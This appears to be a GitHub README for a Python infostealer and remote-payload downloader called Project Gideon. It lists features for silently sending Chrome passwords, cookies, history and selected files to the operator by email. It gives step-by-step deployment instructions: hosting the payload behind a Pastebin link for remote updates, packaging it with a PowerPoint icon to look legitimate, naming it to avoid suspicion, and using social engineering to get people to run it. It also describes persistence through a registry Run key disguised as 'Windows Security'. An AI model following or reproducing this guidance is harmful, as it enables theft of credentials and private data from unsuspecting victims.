Project development has ended, as it's no longer needed or interests me unfortunately.
A personal virus I made in python as a little fun project, This is continuation of Project Blackrod, a similar project but without a downloader and less features, you wouldn't be able to change the payload too because of that. Project Gideon will be regularly maintained and get features added if I got more nice ideas. I might not be updating it alot on Github though as I am too lazy to change it from personal use I made for myself or vice versa.
- Sufficient Testing with the new
get_chrome_history()
function - Finished decoupling with
browserhistory
library - delete residual files with
os
lib on temp folder - Make it so that chrome is unopenable via
ctypes
lib - Make a builder for easier installation (Reason: I just never did it so I am not sure how and which approach should I do, should I go with
setup.py
?build.bat
? [Probably going withbuild.bat
]) - Add
Hidden
attribute to the payload via either win32 lib or subprocessing lib (Reason: I am not sure if it would be easily detectable by an antivirus if I do that) - Consideration for sending stuff like chrome password etc via discord webhook
- Make a switch incase you want to do it at a specific time (Reason to not: Might be slightly memory consuming to check it every few seconds)
=======
Warning:
readme.md
is slightly outdated since I made it quite sometime ago
Downloader
Features:
- Updateable Payload
- Easily modifiable sleep time
- Silent and light
- No need for any paid services or complicated stuff
Payload
Features:
- Silently sends Chrome History
- Silently sends some specific tabs you want with cookies included [Decoupled, See: Gform Downloader]
- Silently sends Chrome Password
- Silently sends Files with certain
keywords
,Date modified
, andExtension
- Send via email
It used to have a wifi pw stealer but they are often detected by antiviruses
- Python
- Pyinstaller
- mimetypes
- smtplib
- email.message
- urllib2
- urllib.request
(Not updated yet)
Most of these don't require installing, check requirements.txt
for non-builtins libraries
Disclaimer: Educational Purposes only, I do not hold any responsibility on what others do using this program. This program is only meant to teach how viruses can be made with innocent pieces of codes. By using this as an inspiration or using the code itself, you are agreeing that I do not hold any responsibilities of what you do.
To set up the payload, you will need 2 email addresses, one to send and one to receive. For the sender, you will need an App password
of the sender email, You can simply get this by turning 2FA
- Go to Gmail
- Click your profile picture at top right of the page
- Click
Manage Your Google Account
- Go to
Security
Tab - Scroll down to 2FA, click, and follow the steps
- After you finished, Proceed with getting the app password
- Below 2FA, You'd find
App Password
, if not just go here - Just click
Select App
and chooseOther (Custom name)
, You are free to name it anything
- Copy the 16-characters code given
- Open the payload in an IDE or any code editor
- Fill these up with the necessary credentials
- Scroll down to
clairvoyance_mod
function - Modify
EXTENSION
,DETECT_KEYWORD
,Days
(As in how many days back since modified) as you liked, I limited scans onC:\\
toDETECT_TUPLE
, you can change this by just changing the contents of the tuple to("C:\\",)
- You also can download different types of websites with cookies on it by changing the requirements on this piece of code
- Once you are ready, save it
- Open the downloader in an IDE or any code editor (Even Notepad)
- Make sure to already create the payload
- Open Pastebin, Make sure to sign in/Sign Up so you have access into it. We are using pastebin because it provides a static link that we could use as a pointer to a link that changes once you change the file, I am personally using discord as a dynamic link but it is incredibly up to you (I reccomend Google Drive if it goes undetected by it as suspicious), just make sure the link will directly downloads the file.
- Back to Pastebin, Just put the dynamic link inside the pastebin and set the
paste expiration
tonever
andpaste exposure
tounlisted
- Click
Create new paste
- You should be redirected to your own pastebin, click
raw
- Copy the link, it should start with
https://pastebin.com/raw/
and end with a string of random numbers and letters
- Scroll to
download_payload
function and put your pastebin link there
- Scroll to the bottom and change the
file_name
argument to something that does not raise suspicion if found
- Open
Command Prompt
- Get the current directory (Folder) name and add
cd
before it (If it's on another drive, just write the drive name, I.e. if the file is on D: drive, typeD:
and press enter)
- type
Pyinstaller -F -w downloader.exe
, I usually use a powerpoint icon to make it seem more legit, if you are using that as well, I provided mine in the project files, You can writePyinstaller -F -w -i pptxico.ico downloader.exe
- Wait until it finishes (If you got any errors, probably you either casually changed ".png" extension to ".ico" without converters or you did not properly install pyinstaller)
- Once finished, a new directory called
build
anddist
should appear, opendist
and your personal downloader should be ready
Just place the downloader (the payload is hosted on the internet) on a hard drive/internet and run it on another windows PC, or you can do the good old social engineering and make people download and run it I guess? (Remember this is only for educational purposes)
Since this is a general use downloader, you also can change the payload with your own personal payload, Just upload the payload and renew the link on your pastebin and it should work. So yeah you don't need to infect a device twice if you got a new payload. You can also just modify the given payload and follow the steps above again.
Relax, I did not input my credentials to the source code so if you accidentally run the payload, just calmly terminate it from Task Manager
. But If you run the Downloader, It will run every startup and infect you every few hours too. To stop this, terminate it from Task Manager
and follow these steps;
- Open
registry Editor
- Change it to
Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- You should see something called
Windows Security
as a key, right click and click delete
- Since I placed it in somewhat hidden place, We should also remove it from our system despite being unnecessary, just to completely clean it up. Go to
C:\Users\{Your windows profile username}\AppData\Roaming\Microsoft\Windows\Start Menu\programs\
- Delete anything resembling the payload and the downloader
- And that's it! You're completely uninfected